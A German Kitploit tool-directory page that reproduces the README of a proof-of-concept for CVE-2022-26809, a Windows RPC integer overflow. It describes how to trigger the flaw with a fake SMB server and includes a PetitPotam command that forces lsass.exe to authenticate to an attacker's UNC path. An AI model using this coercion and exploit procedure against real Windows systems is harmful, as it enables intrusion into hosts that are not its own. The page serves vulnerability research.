Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Cve-2022-26809 — Proof-of-Concept-Exploit für CVE-2022-26809, eine Integer-Overflow-Schwachstelle in der Windows-RPC-Laufzeitumgebung. Enthält Trigger-Skripte, die eine PetitPotam-artige UNC-Pfad-Erzwingung gegen lsass.exe verwenden, sowie einen Fake-SMB-Server für Exploitation-Tests. | Kitploit
Tools/GitHubGitHub/michealadams30/cve-2022-26809
SchwachstellenanalyseExploitationPenetrationstestsPayload-EntwicklungBinary-Exploitation
GitHubmichealadams30/cve-2022-26809

Cve-2022-26809

Proof-of-Concept-Exploit für CVE-2022-26809, eine Integer-Overflow-Schwachstelle in der Windows-RPC-Laufzeitumgebung. Enthält Trigger-Skripte, die eine PetitPotam-artige UNC-Pfad-Erzwingung gegen lsass.exe verwenden, sowie einen Fake-SMB-Server für Exploitation-Tests.

Repository anzeigen
11vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cve-2022-26809

CVE-2022-26809

Dieses Repository ist lediglich eine Untersuchung zu dieser CVE. Für eine detailliertere Analyse siehe hier.
AKTUALISIERUNG:05/19 2022
Diese Analyse ist noch nicht abgeschlossen....

AKTUALISIERUNG:05/22 2022
HuanGMz Beitrag und Corelight-Blog zeigen den eigentlichen verwundbaren Punkt:

OSF_CASSOCIATION::ProcessBindAckOrNak

Diese Schwachstelle wird ähnlich wie CVE-2021-43893 ausgelöst, wenn die ESFRPC-Anfrage mit UNC-Pfad an lsass.exe gesendet wird: Das Opfer versucht, auf das Ziel als Client zuzugreifen, wodurch ein Integer-Überlauf in der Client-API ausgelöst wird.

Wenn du eine bessere Lösung hast, um diese Schwachstelle auszulösen, kannst du gerne ein Issue oder einen PR einreichen :)

PoC-CVE-2022-26809

siehe hier

Da die Schwachstelle ähnlich wie CVE-2021-43893 ausgelöst wird, klone einfach den -Code.

PetitPotam

Bereite die Umgebung einfach genau so vor:

  • Auslöser: mit PetitPotam
  • Opfer: mit verwundbarer rpcrt4.dll
  • Angreifer: mit Angreifer-Server
  1. Führe fake_smb_server.py auf dem Angreifer-Server aus, nachdem du die rpcrt.py durch die Originalversion ersetzt hast(**Weil Port 445 unter Windows vom System belegt ist, wird empfohlen, den Dienst unter Linux bereitzustellen **
  2. Löse den Zugriff des Opfers auf den Angreifer-Server mit folgendem Befehl aus:
root@kitploit:~
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
  1. Normalerweise verursacht es keinen BSOD. Aktiviere den Page Heap für lsass.exe(Allerdings habe ich es nicht geschafft, einen BSoD auszulösen, aber laut windbg wurde der Integer-Überlauf ausgelöst)

Alte Beschreibung
Hier ist der Reproduktionscode für die Windows-RPC-Schwachstelle CVE-2022-26809, und er verweist auf https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello.

PoC-OSF_SCALL::GetCoalescedBuffer

Meine Python-Version ist 3.6.7 Ich bin mir nicht sicher, ob GetCoalescedBuffer etwas mit der echten CVE-2022-26809 zu tun hat, behalte es einfach. Die poc.py versucht nur, die verwundbare FunktionOSF_SCALL::GetCoalescedBuffer auszulösen; sie würde keinen Absturz verursachen, da ein DWORD-Integer-Überlauf zu schwer zu reproduzieren ist. Und die rpcrt.py ist das Python-Paket impacket.dcerpc.v5.rpcrt, ersetze sie einfach durch das Original, um die Schwachstelle auszulösen(Denk daran, das Original zu sichern :) Ich glaube, die rpcrt.py hat eine Menge Fehler).

Wenn es nicht funktioniert, kann wireshark vielleicht helfen, den Fehler zu finden.

PipeDemo

Falls nötig, verwende einfach nmake, um es neu zu erstellen.

Tool herunterladen